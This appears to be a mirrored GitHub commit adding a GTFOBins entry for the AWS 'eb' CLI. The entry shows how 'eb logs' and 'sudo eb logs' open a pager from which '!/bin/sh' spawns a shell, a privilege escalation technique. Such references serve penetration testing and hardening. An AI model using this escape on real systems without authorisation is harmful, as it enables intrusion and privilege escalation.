1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-04 05:26:04 +02:00
This commit is contained in:
Andrea Cardaci 2020-03-04 20:24:29 +01:00 committed by GitHub
parent b19420d1fd
commit 1b4e4ab15e
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

12
_gtfobins/eb.md Normal file
View File

@ -0,0 +1,12 @@
---
description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.
functions:
shell:
- code: |
eb logs
!/bin/sh
sudo:
- code: |
sudo eb logs
!/bin/sh
---